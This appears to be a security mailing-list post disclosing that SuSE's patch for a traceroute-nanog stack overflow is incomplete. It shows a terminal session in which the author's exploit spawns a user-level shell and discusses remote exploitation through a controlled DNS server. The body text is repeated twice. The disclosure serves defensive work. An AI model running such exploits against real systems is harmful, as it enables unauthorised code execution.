Further to my email posting a working exploit for traceroute-nanog on SuSE
boxes, it would appear the the patch provided by SuSE does not address the
overflow my exploit... um... exploits.
On a patched SuSE 7.2 box:
carl@titan:~/exploits/traceroute-nanog > rpm -qa | grep traceroute
traceroute-6.1.1-0
carl@titan:~/exploits/traceroute-nanog > ./traceroute-exploit -d
Now run this exploit with the '-e' flag.
carl@titan:~/exploits/traceroute-nanog > ./traceroute-exploit -e
traceroute to www.yahoo.akadns.net (64.58.76.230), 30 hops max, 40 byte
packets
1 sh-2.05$ id
uid=500(carl) gid=100(users) groups=100(users)
sh-2.05$
Note that traceroute now drops root privileges (properly; there is no way to
get them back), so even though it is still possible to execute arbitrary code
via a stack overflow, it cannot be done as root.
Of course, if an attacker could control the server that traceroute uses to
lookup DNS admin contact names, then it would be possible to exploit this
flaw remotely. However, the default server used by traceroute is 'localhost'
which makes this almost impossible to exploit in any other way except locally
on an unpatched system.
Hi all,
Further to my email posting a working exploit for traceroute-nanog on SuSE
boxes, it would appear the the patch provided by SuSE does not address the
overflow my exploit... um... exploits.
On a patched SuSE 7.2 box:
carl@titan:~/exploits/traceroute-nanog > rpm -qa | grep traceroute
traceroute-6.1.1-0
carl@titan:~/exploits/traceroute-nanog > ./traceroute-exploit -d
Now run this exploit with the '-e' flag.
carl@titan:~/exploits/traceroute-nanog > ./traceroute-exploit -e
traceroute to www.yahoo.akadns.net (64.58.76.230), 30 hops max, 40 byte
packets
1 sh-2.05$ id
uid=500(carl) gid=100(users) groups=100(users)
sh-2.05$
Note that traceroute now drops root privileges (properly; there is no way to
get them back), so even though it is still possible to execute arbitrary code
via a stack overflow, it cannot be done as root.
Of course, if an attacker could control the server that traceroute uses to
lookup DNS admin contact names, then it would be possible to exploit this
flaw remotely. However, the default server used by traceroute is 'localhost'
which makes this almost impossible to exploit in any other way except locally
on an unpatched system.
Cheers,
Carl.
[ reply ]